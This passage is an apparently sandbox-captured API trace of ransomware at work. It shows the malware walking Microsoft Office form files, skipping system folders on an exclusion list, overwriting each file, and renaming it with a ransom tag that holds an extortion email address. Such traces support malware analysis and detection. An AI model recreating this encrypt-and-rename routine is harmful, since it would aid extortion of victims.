dwFlags=0x0, lpWideCharStr="CONFLICT.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONFLICT.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONFLICT.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONFLICT.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONFLICT.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.776] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONFLICT.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\conflict.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.777] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0129.777] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.777] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0129.779] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.779] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0129.779] CloseHandle (hObject=0x314) returned 1 [0129.779] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONFLICT.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\conflict.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONFLICT.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\conflict.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.780] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7a9345, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7a9345, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x30f, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="CONTACT.CFG", cAlternateFileName="")) returned 1 [0129.780] lstrcmpiW (lpString1="CONTACT.CFG", lpString2=".") returned 1 [0129.780] lstrcmpiW (lpString1="CONTACT.CFG", lpString2="..") returned 1 [0129.780] lstrcmpiW (lpString1="CONTACT.CFG", lpString2="...") returned 1 [0129.780] lstrcmpiW (lpString1="CONTACT.CFG", lpString2="windows") returned -1 [0129.780] lstrcmpiW (lpString1="CONTACT.CFG", lpString2="recovery") returned -1 [0129.781] lstrcmpiW (lpString1="CONTACT.CFG", lpString2="perflogs") returned -1 [0129.781] lstrcmpiW (lpString1="CONTACT.CFG", lpString2="documents and settings") returned -1 [0129.781] lstrcmpiW (lpString1="CONTACT.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.781] lstrcmpiW (lpString1="CONTACT.CFG", lpString2="system volume information") returned -1 [0129.781] lstrcmpiW (lpString1="CONTACT.CFG", lpString2="msocache") returned -1 [0129.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACT.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACT.CFG", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTACT.CFG", lpUsedDefaultChar=0x0) returned 11 [0129.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACT.CFG", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0129.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACT.CFG", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTACT.CFG", lpUsedDefaultChar=0x0) returned 11 [0129.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.781] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONTACT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\contact.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.782] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=783) returned 1 [0129.782] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.782] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x300, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x300, lpOverlapped=0x0) returned 1 [0129.784] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.784] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x300, lpOverlapped=0x0) returned 1 [0129.784] CloseHandle (hObject=0x314) returned 1 [0129.784] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONTACT.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\contact.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONTACT.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\contact.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.785] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="CONTACTL.ICO", cAlternateFileName="")) returned 1 [0129.785] lstrcmpiW (lpString1="CONTACTL.ICO", lpString2=".") returned 1 [0129.785] lstrcmpiW (lpString1="CONTACTL.ICO", lpString2="..") returned 1 [0129.785] lstrcmpiW (lpString1="CONTACTL.ICO", lpString2="...") returned 1 [0129.785] lstrcmpiW (lpString1="CONTACTL.ICO", lpString2="windows") returned -1 [0129.786] lstrcmpiW (lpString1="CONTACTL.ICO", lpString2="recovery") returned -1 [0129.786] lstrcmpiW (lpString1="CONTACTL.ICO", lpString2="perflogs") returned -1 [0129.786] lstrcmpiW (lpString1="CONTACTL.ICO", lpString2="documents and settings") returned -1 [0129.786] lstrcmpiW (lpString1="CONTACTL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.786] lstrcmpiW (lpString1="CONTACTL.ICO", lpString2="system volume information") returned -1 [0129.786] lstrcmpiW (lpString1="CONTACTL.ICO", lpString2="msocache") returned -1 [0129.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTL.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTACTL.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTL.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTACTL.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONTACTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\contactl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.787] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1078) returned 1 [0129.787] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.787] ReadFile (in: hFile=0x314, lpBuffer=0x230a00, nNumberOfBytesToRead=0x430, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e534*=0x430, lpOverlapped=0x0) returned 1 [0129.789] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.789] WriteFile (in: hFile=0x314, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x430, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e530*=0x430, lpOverlapped=0x0) returned 1 [0129.789] CloseHandle (hObject=0x314) returned 1 [0129.789] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONTACTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\contactl.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONTACTL.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\contactl.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.799] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb43bdd5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb43bdd5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb43bdd5, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xbb6, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="CONTACTS.ICO", cAlternateFileName="")) returned 1 [0129.800] lstrcmpiW (lpString1="CONTACTS.ICO", lpString2=".") returned 1 [0129.800] lstrcmpiW (lpString1="CONTACTS.ICO", lpString2="..") returned 1 [0129.800] lstrcmpiW (lpString1="CONTACTS.ICO", lpString2="...") returned 1 [0129.800] lstrcmpiW (lpString1="CONTACTS.ICO", lpString2="windows") returned -1 [0129.800] lstrcmpiW (lpString1="CONTACTS.ICO", lpString2="recovery") returned -1 [0129.800] lstrcmpiW (lpString1="CONTACTS.ICO", lpString2="perflogs") returned -1 [0129.800] lstrcmpiW (lpString1="CONTACTS.ICO", lpString2="documents and settings") returned -1 [0129.800] lstrcmpiW (lpString1="CONTACTS.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.800] lstrcmpiW (lpString1="CONTACTS.ICO", lpString2="system volume information") returned -1 [0129.800] lstrcmpiW (lpString1="CONTACTS.ICO", lpString2="msocache") returned -1 [0129.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTS.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTACTS.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTS.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CONTACTS.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CONTACTS.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.800] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONTACTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\contacts.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.801] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=2998) returned 1 [0129.801] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.801] ReadFile (in: hFile=0x314, lpBuffer=0x278330, nNumberOfBytesToRead=0xbb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesRead=0x345e534*=0xbb0, lpOverlapped=0x0) returned 1 [0129.803] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.803] WriteFile (in: hFile=0x314, lpBuffer=0x278330*, nNumberOfBytesToWrite=0xbb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xbb0, lpOverlapped=0x0) returned 1 [0129.803] CloseHandle (hObject=0x314) returned 1 [0129.803] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONTACTS.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\contacts.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\CONTACTS.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\contacts.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.804] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7cf588, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7cf588, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x325, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="DISTLIST.CFG", cAlternateFileName="")) returned 1 [0129.804] lstrcmpiW (lpString1="DISTLIST.CFG", lpString2=".") returned 1 [0129.804] lstrcmpiW (lpString1="DISTLIST.CFG", lpString2="..") returned 1 [0129.804] lstrcmpiW (lpString1="DISTLIST.CFG", lpString2="...") returned 1 [0129.804] lstrcmpiW (lpString1="DISTLIST.CFG", lpString2="windows") returned -1 [0129.804] lstrcmpiW (lpString1="DISTLIST.CFG", lpString2="recovery") returned -1 [0129.804] lstrcmpiW (lpString1="DISTLIST.CFG", lpString2="perflogs") returned -1 [0129.804] lstrcmpiW (lpString1="DISTLIST.CFG", lpString2="documents and settings") returned -1 [0129.804] lstrcmpiW (lpString1="DISTLIST.CFG", lpString2="$RECYCLE.BIN") returned 1 [0129.804] lstrcmpiW (lpString1="DISTLIST.CFG", lpString2="system volume information") returned -1 [0129.804] lstrcmpiW (lpString1="DISTLIST.CFG", lpString2="msocache") returned -1 [0129.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLIST.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLIST.CFG", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DISTLIST.CFG", lpUsedDefaultChar=0x0) returned 12 [0129.804] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLIST.CFG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLIST.CFG", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DISTLIST.CFG", lpUsedDefaultChar=0x0) returned 12 [0129.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DISTLIST.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\distlist.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.806] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=805) returned 1 [0129.806] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.806] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x320, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e534*=0x320, lpOverlapped=0x0) returned 1 [0129.807] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0129.807] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e530*=0x320, lpOverlapped=0x0) returned 1 [0129.808] CloseHandle (hObject=0x314) returned 1 [0129.808] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DISTLIST.CFG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\distlist.cfg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DISTLIST.CFG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\distlist.cfg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0129.809] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb7a9345, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb7a9345, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb7cf588, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x436, dwReserved0=0x60002, dwReserved1=0x2257dc, cFileName="DISTLSTL.ICO", cAlternateFileName="")) returned 1 [0129.809] lstrcmpiW (lpString1="DISTLSTL.ICO", lpString2=".") returned 1 [0129.809] lstrcmpiW (lpString1="DISTLSTL.ICO", lpString2="..") returned 1 [0129.809] lstrcmpiW (lpString1="DISTLSTL.ICO", lpString2="...") returned 1 [0129.809] lstrcmpiW (lpString1="DISTLSTL.ICO", lpString2="windows") returned -1 [0129.809] lstrcmpiW (lpString1="DISTLSTL.ICO", lpString2="recovery") returned -1 [0129.809] lstrcmpiW (lpString1="DISTLSTL.ICO", lpString2="perflogs") returned -1 [0129.809] lstrcmpiW (lpString1="DISTLSTL.ICO", lpString2="documents and settings") returned -1 [0129.809] lstrcmpiW (lpString1="DISTLSTL.ICO", lpString2="$RECYCLE.BIN") returned 1 [0129.809] lstrcmpiW (lpString1="DISTLSTL.ICO", lpString2="system volume information") returned -1 [0129.809] lstrcmpiW (lpString1="DISTLSTL.ICO", lpString2="msocache") returned -1 [0129.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLSTL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLSTL.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DISTLSTL.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLSTL.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0129.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DISTLSTL.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DISTLSTL.ICO", lpUsedDefaultChar=0x0) returned 12 [0129.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0129.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0129.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\FORMS\\1033\\DISTLSTL.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\forms\\1033\\distlstl.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0129.810] GetFileSizeEx (in: 